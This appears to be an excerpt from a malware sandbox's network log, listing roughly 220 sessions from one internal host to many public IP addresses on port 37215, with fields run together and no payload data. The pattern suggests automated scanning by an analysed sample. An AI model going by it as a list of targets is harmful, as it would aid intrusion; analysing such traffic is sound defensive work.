                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14245192.168.2.1548900222.10.229.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14246192.168.2.154825437.161.205.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14247192.168.2.1555334181.199.45.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14248192.168.2.1536572138.92.16.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14249192.168.2.155636245.84.107.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14250192.168.2.154085645.171.177.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14251192.168.2.1533712102.249.205.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14252192.168.2.155652831.77.217.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14253192.168.2.1542502138.7.43.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14254192.168.2.1536934122.221.126.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14255192.168.2.1553228121.43.219.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14256192.168.2.1546892121.161.46.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14257192.168.2.1542224190.170.186.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14258192.168.2.155949837.204.219.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14259192.168.2.153330837.124.215.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14260192.168.2.154181031.62.131.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14261192.168.2.155732494.119.211.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14262192.168.2.1538556157.216.164.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14263192.168.2.1552044186.32.98.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14264192.168.2.154349237.184.168.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14265192.168.2.1553240197.223.240.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14266192.168.2.1539316138.214.29.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14267192.168.2.1542684186.50.114.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14268192.168.2.1540032156.40.131.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14269192.168.2.155236494.117.241.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14270192.168.2.154232031.167.174.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14271192.168.2.1552058222.152.34.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14272192.168.2.1537070156.51.87.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14273192.168.2.153874431.29.247.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14274192.168.2.1559076197.135.23.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14275192.168.2.1547138102.165.6.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14276192.168.2.1544586121.153.176.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14277192.168.2.1559340113.70.62.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14278192.168.2.1540048122.25.22.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14279192.168.2.1535946138.0.93.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14280192.168.2.153376245.202.132.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14281192.168.2.1556924122.30.220.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14282192.168.2.1554874156.180.217.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14283192.168.2.1537250197.170.213.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14284192.168.2.1542004222.2.113.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14285192.168.2.1542162121.126.64.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14286192.168.2.1554122136.167.51.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14287192.168.2.154905845.145.65.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14288192.168.2.156048641.131.245.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14289192.168.2.1539402157.155.237.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14290192.168.2.1556250122.36.122.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14291192.168.2.154117094.169.31.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14292192.168.2.1544582102.138.148.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14293192.168.2.155108841.40.161.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14294192.168.2.155437837.247.77.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14295192.168.2.155394237.185.162.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14296192.168.2.1534234156.35.173.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14297192.168.2.1550420138.192.66.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14298192.168.2.154115237.214.176.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14299192.168.2.154328431.111.3.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14300192.168.2.1540462222.117.125.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14301192.168.2.155729037.63.141.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14302192.168.2.1555396121.15.225.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14303192.168.2.1554056186.187.72.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14304192.168.2.1543732156.115.251.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14305192.168.2.153604037.126.86.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14306192.168.2.155737694.25.103.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14307192.168.2.1541140181.2.66.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14308192.168.2.155385041.119.69.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14309192.168.2.155464645.177.73.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14310192.168.2.1554112181.113.255.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14311192.168.2.154629031.155.64.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14312192.168.2.154064637.16.190.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14313192.168.2.153649845.225.71.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14314192.168.2.1559546138.128.151.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14315192.168.2.1548084121.159.12.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14316192.168.2.154699037.254.105.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14317192.168.2.1553072138.164.171.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14318192.168.2.1533708197.28.69.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14319192.168.2.153708894.146.184.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14320192.168.2.1535356181.158.128.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14321192.168.2.1552774186.51.34.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14322192.168.2.1541594140.247.171.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14323192.168.2.1534944121.145.72.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14324192.168.2.1536244157.20.162.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14325192.168.2.155594645.96.250.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14326192.168.2.154658638.188.152.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14327192.168.2.1553634186.233.88.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14328192.168.2.1547072190.247.22.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14329192.168.2.1535892186.88.212.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14330192.168.2.154839494.4.182.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14331192.168.2.1533246138.200.178.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14332192.168.2.153477841.182.94.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14333192.168.2.1540196197.153.160.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14334192.168.2.154023494.144.57.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14335192.168.2.155721045.15.129.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14336192.168.2.1551808222.104.35.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14337192.168.2.1547086186.135.210.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14338192.168.2.1552480157.129.24.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14339192.168.2.1559236181.80.91.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14340192.168.2.1539382157.51.164.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14341192.168.2.155686694.19.80.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14342192.168.2.1543712157.166.81.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14343192.168.2.1559208138.124.57.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14344192.168.2.1540648186.168.144.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14345192.168.2.1553202102.43.217.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14346192.168.2.155758641.241.53.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14347192.168.2.155978894.32.196.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14348192.168.2.1535180190.230.188.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14349192.168.2.155199445.88.160.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14350192.168.2.1546730138.242.10.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14351192.168.2.1555328122.215.201.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14352192.168.2.1558244156.62.86.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14353192.168.2.1540390181.115.69.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14354192.168.2.1534984197.132.59.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14355192.168.2.1553808190.62.165.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14356192.168.2.153988637.232.212.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14357192.168.2.1549520190.240.248.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14358192.168.2.154562641.142.49.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14359192.168.2.1554598122.193.31.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14360192.168.2.154230034.189.243.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14361192.168.2.1555042108.70.7.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14362192.168.2.153434037.96.89.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14363192.168.2.1541860156.157.194.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14364192.168.2.1535494186.50.118.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14365192.168.2.154565094.200.93.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14366192.168.2.1540424190.218.168.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14367192.168.2.1548506190.106.206.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14368192.168.2.153634694.135.125.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14369192.168.2.1555738186.211.49.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14370192.168.2.1546370157.145.139.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14371192.168.2.1540830121.85.78.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14372192.168.2.1547988102.18.130.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14373192.168.2.1555378121.216.68.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14374192.168.2.1552006222.16.184.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14375192.168.2.1557818138.48.228.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14376192.168.2.1551796190.19.104.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14377192.168.2.1558204190.212.223.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14378192.168.2.1536106138.35.40.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14379192.168.2.1552572159.211.174.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14380192.168.2.1533984156.119.127.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14381192.168.2.1543540181.31.167.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14382192.168.2.1548240121.232.30.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14383192.168.2.1560382121.61.103.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14384192.168.2.1553884122.190.108.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14385192.168.2.155174031.179.238.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14386192.168.2.154983694.218.22.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14387192.168.2.154135864.104.166.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14388192.168.2.1543964102.103.11.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14389192.168.2.1559498222.184.14.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14390192.168.2.155904631.6.212.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14391192.168.2.1544680186.56.71.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14392192.168.2.155113045.4.247.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14393192.168.2.154234894.34.57.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14394192.168.2.1539710122.101.246.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14395192.168.2.1557192122.170.24.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14396192.168.2.155830045.88.239.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14397192.168.2.1535606165.30.240.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14398192.168.2.1558624157.140.178.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14399192.168.2.1551564190.164.183.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14400192.168.2.1536946122.221.15.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14401192.168.2.1556064222.45.4.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14402192.168.2.154697437.96.251.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14403192.168.2.1539078181.201.184.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14404192.168.2.1538616102.120.80.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14405192.168.2.1534706138.153.148.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14406192.168.2.1538972122.97.125.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14407192.168.2.1535998222.14.173.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14408192.168.2.1547752138.192.142.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14409192.168.2.1536256121.10.13.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14410192.168.2.1539046121.85.118.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14411192.168.2.153547041.6.103.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14412192.168.2.155717031.215.47.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14413192.168.2.1560228156.241.217.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14414192.168.2.1553846169.205.180.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14415192.168.2.1539520138.198.162.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14416192.168.2.1540052197.56.97.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14417192.168.2.1553782138.245.124.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14418192.168.2.1559910156.99.206.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14419192.168.2.1538486122.2.146.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14420192.168.2.1548100222.76.20.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14421192.168.2.155628494.175.153.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14422192.168.2.1554962186.142.210.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14423192.168.2.155758094.144.7.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14424192.168.2.1553628121.119.151.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14425192.168.2.155270437.157.38.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14426192.168.2.1548372197.84.84.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14427192.168.2.155938445.109.178.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14428192.168.2.1535836222.19.11.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14429192.168.2.1547876121.221.49.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14430192.168.2.155715831.112.146.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14431192.168.2.153843431.15.143.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14432192.168.2.154877245.128.72.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14433192.168.2.1543338157.57.236.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14434192.168.2.1533844190.70.108.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14435192.168.2.153681094.174.18.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14436192.168.2.1558048190.255.59.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14437192.168.2.1533030121.249.15.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14438192.168.2.153631694.3.114.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14439192.168.2.1560378197.128.15.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14440192.168.2.1544836186.202.249.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14441192.168.2.1553168122.169.141.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14442192.168.2.154728275.162.247.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14443192.168.2.1539940121.138.138.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14444192.168.2.1544172156.129.181.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14445192.168.2.1558722136.193.117.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14446192.168.2.1554084122.110.110.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14447192.168.2.154363231.220.44.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14448192.168.2.1560882122.79.131.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14449192.168.2.1557230102.163.177.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14450192.168.2.1546828138.193.197.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14451192.168.2.156069094.141.26.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14452192.168.2.155648445.154.141.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14453192.168.2.1544998156.82.204.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14454192.168.2.155609631.254.132.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14455192.168.2.1544576102.198.9.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14456192.168.2.1537118190.245.136.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14457192.168.2.1544434121.20.237.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14458192.168.2.1533844186.75.253.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14459192.168.2.156093294.165.99.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14460192.168.2.1543568157.38.116.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14461192.168.2.1536618138.197.180.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14462192.168.2.1557630222.9.64.10437215
                                              TimestampBytes transferredDirectionData


